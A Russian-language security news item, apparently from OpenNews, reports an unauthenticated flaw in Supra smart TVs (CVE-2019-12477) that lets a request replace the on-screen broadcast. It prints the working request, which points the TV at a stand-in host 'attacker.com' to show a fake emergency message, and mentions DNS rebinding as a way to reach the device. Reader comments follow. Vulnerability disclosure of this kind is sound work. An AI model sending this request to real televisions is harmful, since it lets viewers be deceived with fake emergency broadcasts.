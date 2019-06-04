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Уязвимость в умных телевизорах Supra, позволяющая вывести фиктивное видео

04.06.2019 15:28

В телевизорах Supra Smart Cloud TV выявлена уязвимость (CVE-2019-12477), позволяющая подменить просматриваемую в данный момент передачу на контент атакующего. В качестве примера продемонстрирован вывод фиктивного предупреждения о возникновении чрезвычайной ситуации.

Для атаки достаточно отправить специально оформленный сетевой запрос, не требующий аутентификации. В частности, можно обратиться к обработчику "/remote/media_control?action=setUri&uri=" указав URL m3u8-файла с параметрами видео, например "http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8".

В большинстве случаев доступ к IP-адресу телевизора ограничен внутренней сетью, но так как запрос отправляется через HTTP возможно применение методов для обращения к внутренним ресурсам при открытии пользователем специально оформленной внешней страницы (например, под видом запроса картинки или используя метод DNS Rebinding).

  1. Главная ссылка к новости (https://www.inputzero.io/2019/...)
  2. OpenNews: Обновление DNS-сервера BIND 9.9.13-P1, 9.10.8-P1, 9.11.4-P1, 9.12.2-P1 с устранением уязвимости
  3. OpenNews: Атака на системы с rTorrent для скрытого майнинга криптовалюты
  4. OpenNews: Представлен инструмент для проведения атак "DNS rebinding"
  5. OpenNews: Уязвимость в BitTorrent-клиенте Transmission, позволяющая выполнить код
  6. OpenNews: Уязвимость в Guile, затрагивающая программы, привязанные к localhost
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: tv, supra
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Обсуждение (4) RSS
  • 1, Аноним (1), 15:34, 04/06/2019 [ответить]  
    		• +2 +/
    Один член никакой контент, вставленный хакером, не сможет конкурировать по безумности и трэшовости с федеральными телеканалами.
     
     
  • 2, X86 (ok), 15:35, 04/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    мсье небыдло?
     
     
  • 3, A.Stahl (ok), 15:36, 04/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Ну что вы, мы все тут такое же быдло, как и вы....
     
  • 4, Аноним (1), 15:37, 04/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Ты когда в последний раз телевизор врубал?
     
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